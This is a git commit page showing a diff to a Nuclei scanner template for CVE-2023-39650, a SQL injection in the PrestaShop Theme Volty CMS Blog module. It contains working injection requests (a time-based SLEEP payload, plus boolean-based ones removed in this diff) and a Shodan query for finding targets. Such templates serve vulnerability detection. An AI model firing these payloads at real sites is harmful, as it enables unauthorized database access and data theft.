daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated req. & matcher

patch-12
Ritik Chaddha 2024-09-16 17:26:11 +04:00 committed by GitHub
parent 443c618c81
commit 8ed3453a2b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 11 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
http/cves/2023/CVE-2023-39650.yaml
View File

@ -1,62 +1,42 @@
id: CVE-2023-39650 id: CVE-2023-39650
info: info:
name: PrestaShop Theme Volty CMS Blog SQL Injection name: PrestaShop Theme Volty CMS Blog - SQL Injection
author: mastercho author: mastercho
severity: critical severity: critical
description: | description: |
In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
impact: | impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference: reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650
- https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-39650
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2023-27847 cve-id: CVE-2023-39650
cwe-id: CWE-89 cwe-id: CWE-89
epss-score: 0.04685 epss-score: 0.04685
epss-percentile: 0.91818 epss-percentile: 0.91818
metadata: metadata:
redirects: true max-request: 1
max-redirects: 3 verified: true
framework: prestashop framework: prestashop
shodan-query: http.component:"Prestashop" shodan-query: html:"/tvcmsblog"
tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog tags: cve,cve2023,prestashop,sqli,tvcmsblog
http: http:
- raw: - raw:
- | - |
@timeout: 20s @timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1 GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(6)))oqFL)--+yxoW HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
host-redirects: true host-redirects: true
matchers: matchers:
- type: dsl - type: dsl
name: time-based name: time-based
dsl: dsl:
- 'duration_1>=5' - 'duration>=6'
- 'status_code_1 == 200 && contains(body_1, "tvcmsblog")' - 'status_code == 200 && contains_all(tolower(response), "tvcmsblog", "prestashop")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
- 'status_code_2 == 200 && status_code_3 == 302'
condition: and condition: and